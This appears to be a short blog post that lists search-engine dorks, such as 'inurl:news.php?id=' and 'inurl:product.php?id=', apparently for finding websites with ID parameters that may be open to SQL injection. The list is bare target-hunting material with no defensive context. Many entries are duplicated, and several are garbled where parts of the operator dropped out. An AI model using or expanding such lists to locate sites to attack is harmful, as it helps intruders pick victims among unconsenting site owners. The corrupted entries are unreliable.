inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Publicado por en
Suscribirse a: Entradas (Atom)